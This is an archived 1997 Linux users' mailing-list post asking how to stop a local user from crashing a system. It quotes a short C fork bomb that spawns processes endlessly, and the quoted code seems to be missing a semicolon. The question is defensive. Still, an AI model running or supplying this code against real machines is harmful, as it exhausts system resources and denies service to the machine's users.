[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[ale] fork killer
- Subject: [ale] fork killer
- From: cfowler at avana.net (Christopher Fowler)
- Date: Tue, 11 Nov 1997 22:19:45 -0500
What can keep someone from running this program and taking down linux
box
---- cut here ----
#include <unistd.h>
main()
{
int X=0;
do
fork();
while ( X == 0 )
return 0;
}
---------------------